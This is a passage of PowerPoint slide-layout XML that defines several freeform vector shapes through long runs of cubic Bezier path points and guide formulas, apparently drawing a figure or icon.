            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="292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Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="2920"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 173 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 201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7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3 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 67 h 209"/>
                  <a:gd name="T46" fmla="*/ 74 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 64 w 179"/>
                  <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 145 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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1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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="208"/>
                      <a:pt x="128" y="208"/>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3"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="198"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="193"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="154"/>
                      <a:pt x="23" y="149"/>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3"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="170"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="184"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="193"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="198"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="203"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="185"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="142"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="144"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="136"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="86"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="67"/>
                      <a:pt x="60" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="57"/>
                      <a:pt x="59" y="50"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="32"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="0"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="39"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="158"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="153"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="147"/>
                      <a:pt x="125" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="170"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="188"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="204"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="183"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="172"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="157"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="65"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="66"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="81"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="76"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="70"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="72"/>
                      <a:pt x="65" y="74"/>
                      <a:pt x="64" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="88"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="98"/>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="137"/>
                      <a:pt x="46"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0"/>
                      <a:pt x="38" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="137"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="166"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="174"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="185"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="193"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="182"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="185"/>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2"/>
                      <a:pt x="117" y="173"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="174"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="145"/>
                      <a:pt x="126" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="145"/>
                      <a:pt x="127" y="145"/>
                      <a:pt x="127" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="137"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="116"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="137"/>
                      <a:pt x="132" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="132"/>
                      <a:pt x="128" y="130"/>
                      <a:pt x="128" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="102"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="78"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="55"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="50"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="46"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="43"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="45"/>
                      <a:pt x="80" y="45"/>
                      <a:pt x="80" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="34"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="30"/>
                      <a:pt x="71" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="30"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="44"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
